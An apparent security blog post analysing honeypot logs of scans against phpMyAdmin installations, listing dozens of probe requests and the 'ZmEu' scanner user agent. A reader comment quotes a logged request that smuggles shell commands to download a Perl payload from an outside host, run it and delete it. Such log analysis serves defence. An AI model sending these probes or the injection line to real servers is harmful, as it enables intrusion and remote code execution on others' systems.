Sunday night and the weather is getting colder, kids asleep, a nice time to check on honeypot logs. Some days ago SANS reported a new at that time binary "dd_ssh" ( http://isc.sans.edu/diary.html?storyid=9370 ) and it related the attack on the phpMyAdmin vulnerability. Honeypot is grabbing some URLs also possibly related on the same attack vector.
GET //phpMyAdmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlweb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webdb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //bbs/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmy-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc1config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-pl1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.4/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.3/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //websql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //roundcube/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqladminconfig/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sl2/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1
There is one user agent that is appearing in the logs also " User-Agent: Made by ZmEu @ WhiteHat Team - www.whitehat.ro ", the report on whithat.ro ( http://www.mywot.com/en/scorecard/whitehat.ro ) though gives nothing like whitehat...
"GET //phpmyadmin//config.inc.php?c=cd%20/tmp;wget%20idol.altervista.org/whitehat;perl%20whitehat;rm%20-rf%20whitehat HTTP/1.1" 200 - "-" "ZmEu"
ReplyDeletethis is a log from the same attack